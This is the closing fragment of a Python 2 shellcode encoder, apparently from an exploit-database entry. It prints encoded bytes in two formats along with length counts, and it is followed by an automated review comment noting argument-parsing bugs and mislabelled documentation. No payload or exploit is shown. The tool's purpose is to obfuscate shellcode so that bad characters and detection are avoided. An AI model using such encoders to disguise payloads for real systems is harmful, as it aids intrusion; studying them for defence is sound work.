# encoded += '\\x%02x' % random.randint(1,255)
encoded2 += '0x%s,' % en_byte
# encoded2 += '0x%02x,' % random.randint(1,255)
#encoded += '\n'
print '[#] Encoded shellcode:'
print encoded
print encoded2
print '[#] Shellcode Length: %d' % len(bytearray(shellcode))
print '[#] Encoded Shellcode Length: %d' % encoded.count('x')
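Review bot: Two unhandled cases in the argument parsing: `-e/--entropy` and `-b/--badchars` are optional with no default, so running the script without `-e` fails at `random.randint(1, entropy)` with a `TypeError` on `None`, and running it without `-b` fails at `bad_chars.split(',')` with an `AttributeError`; mark both `required=True` or give defaults (`default=1`, `default=""`), which would also let the commented-out `sys.argv` handling be deleted. The comment `Generate byte string from \x01 to \xff` does not match `for o in range(256)`, which starts at `00`; make the loop and the comment agree. The CSV entry calls this an "Encoder and Decoder" but the file contains only the encoder, the `-b` help text reads `to removed`, and `random.randint(1, entropy)` is documented as "use a value between 1 & 10" without being enforced.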